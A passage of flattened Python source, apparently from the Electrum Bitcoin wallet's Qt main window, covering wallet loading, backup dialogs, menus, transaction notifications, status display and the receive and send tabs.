fetch_alias(self): self.alias_info = None alias = self.config.get('alias') if alias: alias = str(alias) def f(): self.alias_info = self.contacts.resolve_openalias(alias) self.alias_received_signal.emit() t = threading.Thread(target=f) t.setDaemon(True) t.start() def close_wallet(self): if self.wallet: self.logger.info(f'close_wallet {self.wallet.storage.path}') self.wallet.thread = None run_hook('close_wallet', self.wallet) @profiler def load_wallet(self, wallet: Abstract_Wallet): wallet.thread = TaskThread(self, self.on_error) self.update_recently_visited(wallet.storage.path) if wallet.has_lightning(): util.trigger_callback('channels_updated', wallet) self.need_update.set() # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized # update menus self.seed_menu.setEnabled(self.wallet.has_seed()) self.update_lock_icon() self.update_buttons_on_seed() self.update_console() self.clear_receive_tab() self.request_list.update() self.channels_list.update() self.tabs.show() self.init_geometry() if self.config.get('hide_gui') and self.gui_object.tray.isVisible(): self.hide() else: self.show() self.watching_only_changed() run_hook('load_wallet', wallet, self) try: 
wallet.try_detecting_internal_addresses_corruption() except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) def init_geometry(self): winpos = self.wallet.db.get("winpos-qt") try: screen = self.app.desktop().screenGeometry() assert screen.contains(QRect(*winpos)) self.setGeometry(*winpos) except: self.logger.info("using default geometry") self.setGeometry(100, 100, 840, 400) def watching_only_changed(self): name = "Electrum Testnet" if constants.net.TESTNET else "Electrum" title = '%s %s - %s' % (name, ELECTRUM_VERSION, self.wallet.basename()) extra = [self.wallet.db.get('wallet_type', '?')] if self.wallet.is_watching_only(): extra.append(_('watching only')) title += ' [%s]'% ', '.join(extra) self.setWindowTitle(title) self.password_menu.setEnabled(self.wallet.may_have_password()) self.import_privkey_menu.setVisible(self.wallet.can_import_privkey()) self.import_address_menu.setVisible(self.wallet.can_import_address()) self.export_menu.setEnabled(self.wallet.can_export()) def warn_if_watching_only(self): if self.wallet.is_watching_only(): msg = ' '.join([ _("This wallet is watching-only."), _("This means you will not be able to spend Bitcoins with it."), _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.") ]) self.show_warning(msg, title=_('Watch-only wallet')) def warn_if_testnet(self): if not constants.net.TESTNET: return # user might have opted out already if self.config.get('dont_show_testnet_warning', False): return # only show once per process lifecycle if getattr(self.gui_object, '_warned_testnet', False): return self.gui_object._warned_testnet = True msg = ''.join([ _("You are in testnet mode."), ' ', _("Testnet coins are worthless."), '\n', _("Testnet is separate from the main Bitcoin network. 
It is used for testing.") ]) cb = QCheckBox(_("Don't show this again.")) cb_checked = False def on_cb(x): nonlocal cb_checked cb_checked = x == Qt.Checked cb.stateChanged.connect(on_cb) self.show_warning(msg, title=_('Testnet'), checkbox=cb) if cb_checked: self.config.set_key('dont_show_testnet_warning', True) def open_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if not filename: return self.gui_object.new_window(filename) def select_backup_dir(self, b): name = self.config.get('backup_dir', '') dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name) if dirname: self.config.set_key('backup_dir', dirname) self.backup_dir_e.setText(dirname) def backup_wallet(self): d = WindowModalDialog(self, _("File Backup")) vbox = QVBoxLayout(d) grid = QGridLayout() backup_help = "" backup_dir = self.config.get('backup_dir') backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help) msg = _('Please select a backup directory') if self.wallet.has_lightning() and self.wallet.lnworker.channels: msg += '\n\n' + ' '.join([ _("Note that lightning channels will be converted to channel backups."), _("You cannot use channel backups to perform lightning payments."), _("Channel backups can only be used to request your channels to be closed.") ]) self.backup_dir_e = QPushButton(backup_dir) self.backup_dir_e.clicked.connect(self.select_backup_dir) grid.addWidget(backup_dir_label, 1, 0) grid.addWidget(self.backup_dir_e, 1, 1) vbox.addLayout(grid) vbox.addWidget(WWLabel(msg)) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return try: new_path = self.wallet.save_backup() except BaseException as reason: self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup")) return if new_path: msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path) self.show_message(msg, title=_("Wallet backup created")) else: self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created")) def update_recently_visited(self, filename): recent = self.config.get('recently_open', []) try: sorted(recent) except: recent = [] if filename in recent: recent.remove(filename) recent.insert(0, filename) recent = [path for path in recent if os.path.exists(path)] recent = recent[:5] self.config.set_key('recently_open', recent) self.recently_visited_menu.clear() for i, k in enumerate(sorted(recent)): b = os.path.basename(k) def loader(k): return lambda: self.gui_object.new_window(k) self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1))) self.recently_visited_menu.setEnabled(len(recent)) def get_wallet_folder(self): return os.path.dirname(os.path.abspath(self.wallet.storage.path)) def new_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename = get_new_wallet_name(wallet_folder) full_path = os.path.join(wallet_folder, filename) self.gui_object.start_new_window(full_path, None) def init_menubar(self): menubar = QMenuBar() file_menu = menubar.addMenu(_("&File")) self.recently_visited_menu = file_menu.addMenu(_("&Recently open")) file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open) file_menu.addAction(_("&New/Restore"), 
self.new_wallet).setShortcut(QKeySequence.New) file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs) file_menu.addAction(_("Delete"), self.remove_wallet) file_menu.addSeparator() file_menu.addAction(_("&Quit"), self.close) wallet_menu = menubar.addMenu(_("&Wallet")) wallet_menu.addAction(_("&Information"), self.show_wallet_info) wallet_menu.addSeparator() self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog) self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog) self.private_keys_menu = wallet_menu.addMenu(_("&Private keys")) self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog) self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey) self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog) self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses) wallet_menu.addSeparator() addresses_menu = wallet_menu.addMenu(_("&Addresses")) addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config)) labels_menu = wallet_menu.addMenu(_("&Labels")) labels_menu.addAction(_("&Import"), self.do_import_labels) labels_menu.addAction(_("&Export"), self.do_export_labels) history_menu = wallet_menu.addMenu(_("&History")) history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config)) history_menu.addAction(_("&Summary"), self.history_list.show_summary) history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog) history_menu.addAction(_("&Export"), self.history_list.export_history_dialog) contacts_menu = wallet_menu.addMenu(_("Contacts")) contacts_menu.addAction(_("&New"), self.new_contact_dialog) contacts_menu.addAction(_("Import"), lambda: self.import_contacts()) contacts_menu.addAction(_("Export"), lambda: self.export_contacts()) invoices_menu = wallet_menu.addMenu(_("Invoices")) invoices_menu.addAction(_("Import"), lambda: self.import_invoices()) invoices_menu.addAction(_("Export"), lambda: self.export_invoices()) requests_menu = wallet_menu.addMenu(_("Requests")) requests_menu.addAction(_("Import"), lambda: self.import_requests()) requests_menu.addAction(_("Export"), lambda: self.export_requests()) wallet_menu.addSeparator() wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F")) def add_toggle_action(view_menu, tab): is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False) item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab)) view_menu = menubar.addMenu(_("&View")) add_toggle_action(view_menu, self.addresses_tab) add_toggle_action(view_menu, self.utxo_tab) add_toggle_action(view_menu, self.channels_tab) add_toggle_action(view_menu, self.contacts_tab) add_toggle_action(view_menu, self.console_tab) tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction if sys.platform == 'darwin': # "Settings"/"Preferences" are all reserved keywords in macOS. 
# preferences_action will get picked up based on name (and put into a standardized location, # and given a standard reserved hotkey) # Hence, this menu item will be at a "uniform location re macOS processes" preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences # Add another preferences item, to also have a "uniform location for Electrum between different OSes" tools_menu.addAction(_("Electrum preferences"), self.settings_dialog) tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network)) tools_menu.addAction(_("&Lightning Gossip"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network)) tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower)) tools_menu.addAction(_("&Plugins"), self.plugins_dialog) tools_menu.addSeparator() tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message) tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message) tools_menu.addSeparator() paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany) raw_transaction_menu = tools_menu.addMenu(_("&Load transaction")) raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file) raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text) raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid) raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode) self.raw_transaction_menu = raw_transaction_menu run_hook('init_menubar_tools', self, tools_menu) help_menu = menubar.addMenu(_("&Help")) help_menu.addAction(_("&About"), self.show_about) help_menu.addAction(_("&Check for updates"), self.show_update_check) help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org")) help_menu.addSeparator() help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents) if not constants.net.TESTNET: help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper) help_menu.addAction(_("&Report Bug"), self.show_report_bug) help_menu.addSeparator() help_menu.addAction(_("&Donate to server"), self.donate_to_server) self.setMenuBar(menubar) def donate_to_server(self): d = self.network.get_donation_address() if d: host = self.network.get_parameters().server.host self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host)) else: self.show_error(_('No donation address for this server')) def show_about(self): QMessageBox.about(self, "Electrum", (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" + _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " + _("You do not need to perform regular backups, because your wallet can be " "recovered from a secret phrase that you can memorize or write on paper.") + " " + _("Startup times are instant because it operates in conjunction with high-performance " "servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" + _("Uses icons from the Icons8 icon pack (icons8.com)."))) def show_bitcoin_paper(self): filename = os.path.join(self.config.path, 'bitcoin.pdf') if not os.path.exists(filename): s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713") if not s: return s = s.split("0100000000000000")[1:-1] out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in 
s)[16:-20] with open(filename, 'wb') as f: f.write(bytes.fromhex(out)) webopen('file:///' + filename) def show_update_check(self, version=None): self.gui_object._update_check = UpdateCheck(latest_version=version) def show_report_bug(self): msg = ' '.join([ _("Please report any bugs as issues on github:<br/>"), f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''', _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."), _("Try to explain not only what the bug is, but how it occurs.") ]) self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True) def notify_transactions(self): if self.tx_notification_queue.qsize() == 0: return if not self.wallet.up_to_date: return # no notifications while syncing now = time.time() rate_limit = 20 # seconds if self.tx_notification_last_time + rate_limit > now: return self.tx_notification_last_time = now self.logger.info("Notifying GUI about new transactions") txns = [] while True: try: txns.append(self.tx_notification_queue.get_nowait()) except queue.Empty: break # Combine the transactions if there are at least three if len(txns) >= 3: total_amount = 0 for tx in txns: tx_wallet_delta = self.wallet.get_wallet_delta(tx) if not tx_wallet_delta.is_relevant: continue total_amount += tx_wallet_delta.delta self.notify(_("{} new transactions: Total amount received in the new transactions {}") .format(len(txns), self.format_amount_and_units(total_amount))) else: for tx in txns: tx_wallet_delta = self.wallet.get_wallet_delta(tx) if not tx_wallet_delta.is_relevant: continue self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta))) def notify(self, message): if self.tray: try: # this requires Qt 5.9 self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000) except TypeError: self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000) def timer_actions(self): self.request_list.refresh_status() # Note this runs in the GUI thread if self.need_update.is_set(): self.need_update.clear() self.update_wallet() elif not self.wallet.up_to_date: # this updates "synchronizing" progress self.update_status() # resolve aliases # FIXME this is a blocking network call that has a timeout of 5 sec self.payto_e.resolve() self.notify_transactions() def format_amount(self, amount_sat, is_diff=False, whitespaces=False) -> str: """Formats amount as string, converting to desired unit. E.g. 500_000 -> '0.005' """ return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces) def format_amount_and_units(self, amount_sat) -> str: """Returns string with both bitcoin and fiat amounts, in desired units. E.g. 500_000 -> '0.005 BTC (191.42 EUR)' """ text = self.config.format_amount_and_units(amount_sat) x = self.fx.format_amount_and_units(amount_sat) if self.fx else None if text and x: text += ' (%s)'%x return text def format_fiat_and_units(self, amount_sat) -> str: """Returns string of FX fiat amount, in desired units. E.g. 
500_000 -> '191.42 EUR' """ return self.fx.format_amount_and_units(amount_sat) if self.fx else '' def format_fee_rate(self, fee_rate): return self.config.format_fee_rate(fee_rate) def get_decimal_point(self): return self.config.get_decimal_point() def base_unit(self): return self.config.get_base_unit() def connect_fields(self, window, btc_e, fiat_e, fee_e): def edit_changed(edit): if edit.follows: return edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) fiat_e.is_last_edited = (edit == fiat_e) amount = edit.get_amount() rate = self.fx.exchange_rate() if self.fx else Decimal('NaN') if rate.is_nan() or amount is None: if edit is fiat_e: btc_e.setText("") if fee_e: fee_e.setText("") else: fiat_e.setText("") else: if edit is fiat_e: btc_e.follows = True btc_e.setAmount(int(amount / Decimal(rate) * COIN)) btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) btc_e.follows = False if fee_e: window.update_fee() else: fiat_e.follows = True fiat_e.setText(self.fx.ccy_amount_str( amount * Decimal(rate) / COIN, False)) fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) fiat_e.follows = False btc_e.follows = False fiat_e.follows = False fiat_e.textChanged.connect(partial(edit_changed, fiat_e)) btc_e.textChanged.connect(partial(edit_changed, btc_e)) fiat_e.is_last_edited = False def update_status(self): if not self.wallet: return if self.network is None: text = _("Offline") icon = read_QIcon("status_disconnected.png") elif self.network.is_connected(): server_height = self.network.get_server_height() server_lag = self.network.get_local_height() - server_height fork_str = "_fork" if len(self.network.get_blockchains())>1 else "" # Server height can be 0 after switching to a new server # until we get a headers subscription request response. # Display the synchronizing message in that case. 
if not self.wallet.up_to_date or server_height == 0: num_sent, num_answered = self.wallet.get_history_sync_state_details() text = ("{} ({}/{})" .format(_("Synchronizing..."), num_answered, num_sent)) icon = read_QIcon("status_waiting.png") elif server_lag > 1: text = _("Server is lagging ({} blocks)").format(server_lag) icon = read_QIcon("status_lagging%s.png"%fork_str) else: c, u, x = self.wallet.get_balance() text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c)) if u: text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip()) if x: text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip()) if self.wallet.has_lightning(): l = self.wallet.lnworker.get_balance() text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip()) # append fiat balance and price if self.fx.is_enabled(): text += self.fx.get_fiat_status_text(c + u + x, self.base_unit(), self.get_decimal_point()) or '' if not self.network.proxy: icon = read_QIcon("status_connected%s.png"%fork_str) else: icon = read_QIcon("status_connected_proxy%s.png"%fork_str) else: if self.network.proxy: text = "{} ({})".format(_("Not connected"), _("proxy enabled")) else: text = _("Not connected") icon = read_QIcon("status_disconnected.png") self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename())) self.balance_label.setText(text) if self.status_button: self.status_button.setIcon( icon ) def update_wallet(self): self.update_status() if self.wallet.up_to_date or not self.network or not self.network.is_connected(): self.update_tabs() def update_tabs(self, wallet=None): if wallet is None: wallet = self.wallet if wallet != self.wallet: return self.history_model.refresh('update_tabs') self.request_list.update() self.address_list.update() self.utxo_list.update() self.contact_list.update() self.invoice_list.update() self.channels_list.update_rows.emit(wallet) self.update_completions() def create_channels_tab(self): self.channels_list = ChannelsList(self) t = self.channels_list.get_toolbar() return self.create_list_tab(self.channels_list, t) def create_history_tab(self): self.history_model = HistoryModel(self) self.history_list = l = HistoryList(self, self.history_model) self.history_model.set_view(self.history_list) l.searchable_list = l toolbar = l.create_toolbar(self.config) toolbar_shown = bool(self.config.get('show_toolbar_history', False)) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def show_address(self, addr): from . import address_dialog d = address_dialog.AddressDialog(self, addr) d.exec_() def show_channel(self, channel_id): from . import channel_details channel_details.ChannelDetailsDialog(self, channel_id).show() def show_transaction(self, tx, *, tx_desc=None): '''tx_desc is set only for txs created in the Send tab''' show_transaction(tx, parent=self, desc=tx_desc) def show_lightning_transaction(self, tx_item): from .lightning_tx_dialog import LightningTxDialog d = LightningTxDialog(self, tx_item) d.show() def create_receive_tab(self): # A 4-column grid layout. All the stretch is in the last column. 
# The exchange rate plugin adds a fiat widget in column 2 self.receive_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) self.receive_message_e = QLineEdit() grid.addWidget(QLabel(_('Description')), 0, 0) grid.addWidget(self.receive_message_e, 0, 1, 1, 4) self.receive_message_e.textChanged.connect(self.update_receive_qr) self.receive_amount_e = BTCAmountEdit(self.get_decimal_point) grid.addWidget(QLabel(_('Requested amount')), 1, 0) grid.addWidget(self.receive_amount_e, 1, 1) self.receive_amount_e.textChanged.connect(self.update_receive_qr) self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_receive_e.setVisible(False) grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft) self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None) self.connect_fields(self, self.amount_e, self.fiat_send_e, None) self.expires_combo = QComboBox() evl = sorted(pr_expiration_values.items()) evl_keys = [i[0] for i in evl] evl_values = [i[1] for i in evl] default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING) try: i = evl_keys.index(default_expiry) except ValueError: i = 0 self.expires_combo.addItems(evl_values) self.expires_combo.setCurrentIndex(i) self.expires_combo.setFixedWidth(self.receive_amount_e.width()) def on_expiry(i): self.config.set_key('request_expiry', evl_keys[i]) self.expires_combo.currentIndexChanged.connect(on_expiry) msg = ' '.join([ _('Expiration date of your request.'), _('This information is seen by the recipient if you send them a signed payment request.'), _('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'), _('The bitcoin address never expires and will always be part of this electrum wallet.'), ]) grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0) grid.addWidget(self.expires_combo, 2, 1) self.expires_label = QLineEdit('') self.expires_label.setReadOnly(1) self.expires_label.setFocusPolicy(Qt.NoFocus) self.expires_label.hide() grid.addWidget(self.expires_label, 2, 1) self.clear_invoice_button = QPushButton(_('Clear')) self.clear_invoice_button.clicked.connect(self.clear_receive_tab) self.create_invoice_button = QPushButton(_('New Address')) self.create_invoice_button.setIcon(read_QIcon("bitcoin.png")) self.create_invoice_button.setToolTip('Create on-chain request') self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False)) self.receive_buttons = buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_invoice_button) buttons.addWidget(self.create_invoice_button) if self.wallet.has_lightning(): self.create_invoice_button.setText(_('New Address')) self.create_lightning_invoice_button = QPushButton(_('Lightning')) self.create_lightning_invoice_button.setToolTip('Create lightning request') self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png")) self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True)) buttons.addWidget(self.create_lightning_invoice_button) grid.addLayout(buttons, 4, 3, 1, 2) self.receive_payreq_e = ButtonsTextEdit() self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT)) self.receive_payreq_e.addCopyButton(self.app) self.receive_payreq_e.setReadOnly(True) self.receive_payreq_e.textChanged.connect(self.update_receive_qr) self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus) self.receive_qr = QRCodeWidget(fixedSize=220) self.receive_qr.mouseReleaseEvent = lambda x: 
self.toggle_qr_window() self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor)) self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor)) self.receive_address_e = ButtonsTextEdit() self.receive_address_e.setFont(QFont(MONOSPACE_FONT)) self.receive_address_e.addCopyButton(self.app) self.receive_address_e.setReadOnly(True) self.receive_address_e.textChanged.connect(self.update_receive_address_styling) qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self) qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png" self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code")) self.receive_requests_label = QLabel(_('Receive queue')) from .request_list import RequestList self.request_list = RequestList(self) receive_tabs = QTabWidget() receive_tabs.addTab(self.receive_address_e, _('Address')) receive_tabs.addTab(self.receive_payreq_e, _('Request')) receive_tabs.addTab(self.receive_qr, _('QR Code')) receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0)) receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i)) receive_tabs_sp = receive_tabs.sizePolicy() receive_tabs_sp.setRetainSizeWhenHidden(True) receive_tabs.setSizePolicy(receive_tabs_sp) def maybe_hide_receive_tabs(): receive_tabs.setVisible(bool(self.receive_payreq_e.text())) self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs) maybe_hide_receive_tabs() # layout vbox_g = QVBoxLayout() vbox_g.addLayout(grid) vbox_g.addStretch() hbox = QHBoxLayout() hbox.addLayout(vbox_g) hbox.addStretch() hbox.addWidget(receive_tabs) w = QWidget() w.searchable_list = self.request_list vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.receive_requests_label) vbox.addWidget(self.request_list) vbox.setStretchFactor(self.request_list, 1000) return w def delete_requests(self, keys): for key in keys: self.wallet.delete_request(key) self.request_list.update() self.clear_receive_tab() def delete_lightning_payreq(self, payreq_key): self.wallet.lnworker.delete_invoice(payreq_key) self.request_list.update() self.invoice_list.update() self.clear_receive_tab() def sign_payment_request(self, addr): alias = self.config.get('alias') if alias and self.alias_info: alias_addr, alias_name, validated = self.alias_info if alias_addr: if self.wallet.is_mine(alias_addr): msg = _('This payment request will be signed.') + '\n' + _('Please enter your password') password = None if self.wallet.has_keystore_encryption(): password = self.password_dialog(msg) if not password: return try: self.wallet.sign_payment_request(addr, alias, alias_addr, password) except Exception as e: self.show_error(repr(e)) return else: return def create_invoice(self, is_lightning): amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING) if is_lightning: if not self.wallet.lnworker.channels: self.show_error(_("You need to open a Lightning channel first.")) return # TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy) key = self.wallet.lnworker.add_request(amount, message, expiry) else: key = self.create_bitcoin_request(amount, message, expiry) if not key: return self.address_list.update() assert key is not None self.request_list.update() self.request_list.select_key(key) # clear request fields self.receive_amount_e.setText('') 
self.receive_message_e.setText('') # copy to clipboard r = self.wallet.get_request(key) content = r.invoice if r.is_lightning() else r.get_address() title = _('Invoice') if is_lightning else _('Address') self.do_copy(content, title=title) def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]: addr = self.wallet.get_unused_address() if addr is None: if not self.wallet.is_deterministic(): # imported wallet msg = [ _('No more addresses in your wallet.'), ' ', _('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ', _('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n', _('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'), ] if not self.question(''.join(msg)): return addr = self.wallet.get_receiving_address() else: # deterministic wallet if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")): return addr = self.wallet.create_new_address(False) req = self.wallet.make_payment_request(addr, amount, message, expiration) try: self.wallet.add_payment_request(req) except Exception as e: self.logger.exception('Error adding payment request') self.show_error(_('Error adding payment request') + ':\n' + repr(e)) else: self.sign_payment_request(addr) return addr def do_copy(self, content: str, *, title: str = None) -> None: self.app.clipboard().setText(content) if title is None: tooltip_text = _("Text copied to clipboard").format(title) else: tooltip_text = _("{} copied to clipboard").format(title) QToolTip.showText(QCursor.pos(), tooltip_text, self) def clear_receive_tab(self): self.receive_payreq_e.setText('') self.receive_address_e.setText('') self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) self.expires_label.hide() self.expires_combo.show() self.request_list.clearSelection() def toggle_qr_window(self): from . import qrwindow if not self.qr_window: self.qr_window = qrwindow.QR_Window(self) self.qr_window.setVisible(True) self.qr_window_geometry = self.qr_window.geometry() else: if not self.qr_window.isVisible(): self.qr_window.setVisible(True) self.qr_window.setGeometry(self.qr_window_geometry) else: self.qr_window_geometry = self.qr_window.geometry() self.qr_window.setVisible(False) self.update_receive_qr() def show_send_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab)) def show_receive_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab)) def update_receive_qr(self): uri = str(self.receive_payreq_e.text()) if maybe_extract_bolt11_invoice(uri): # encode lightning invoices as uppercase so QR encoding can use # alphanumeric mode; resulting in smaller QR codes uri = uri.upper() self.receive_qr.setData(uri) if self.qr_window and self.qr_window.isVisible(): self.qr_window.qrw.setData(uri) def update_receive_address_styling(self): addr = str(self.receive_address_e.text()) if is_address(addr) and self.wallet.is_used(addr): self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) self.receive_address_e.setToolTip(_("This address has already been used. 
" "For better privacy, do not reuse it for new payments.")) else: self.receive_address_e.setStyleSheet("") self.receive_address_e.setToolTip("") def create_send_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.send_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) from .paytoedit import PayToEdit self.amount_e = BTCAmountEdit(self.get_decimal_point) self.payto_e = PayToEdit(self) self.payto_e.addPasteButton(self.app) msg = _('Recipient of the funds.') + '\n\n'\ + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)') payto_label = HelpLabel(_('Pay to'), msg) grid.addWidget(payto_label, 1, 0) grid.addWidget(self.payto_e, 1, 1, 1, -1) completer = QCompleter() completer.setCaseSensitivity(False) self.payto_e.set_completer(completer) completer.setModel(self.completions) msg = _('Description of the transaction (not mandatory).') + '\n\n'\ + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.') description_label = HelpLabel(_('Description'), msg) grid.addWidget(description_label, 2, 0) self.message_e = FreezableLineEdit() self.message_e.setMinimumWidth(700) grid.addWidget(self.message_e, 2, 1, 1, -1) msg = _('Amount to be sent.') + '\n\n' \ + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \ + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \ + _('Keyboard shortcut: type "!" to send all your coins.') amount_label = HelpLabel(_('Amount'), msg) grid.addWidget(amount_label, 3, 0) grid.addWidget(self.amount_e, 3, 1) self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_send_e.setVisible(False) grid.addWidget(self.fiat_send_e, 3, 2) self.amount_e.frozen.connect( lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly())) self.max_button = EnterButton(_("Max"), self.spend_max) self.max_button.setFixedWidth(100) self.max_button.setCheckable(True) grid.addWidget(self.max_button, 3, 3) self.save_button = EnterButton(_("Save"), self.do_save_invoice) self.send_button = EnterButton(_("Pay") + "...", self.do_pay) self.clear_button = EnterButton(_("Clear"), self.do_clear) buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_button) buttons.addWidget(self.save_button) buttons.addWidget(self.send_button) grid.addLayout(buttons, 6, 1, 1, 4) self.amount_e.shortcut.connect(self.spend_max) def reset_max(text): self.max_button.setChecked(False) enable = not bool(text) and not self.amount_e.isReadOnly() #self.max_button.setEnabled(enable) self.amount_e.textEdited.connect(reset_max) self.fiat_send_e.textEdited.connect(reset_max) self.set_onchain(False) self.invoices_label = QLabel(_('Send queue')) from .invoice_list import InvoiceList self.invoice_list = InvoiceList(self) vbox0 = QVBoxLayout() 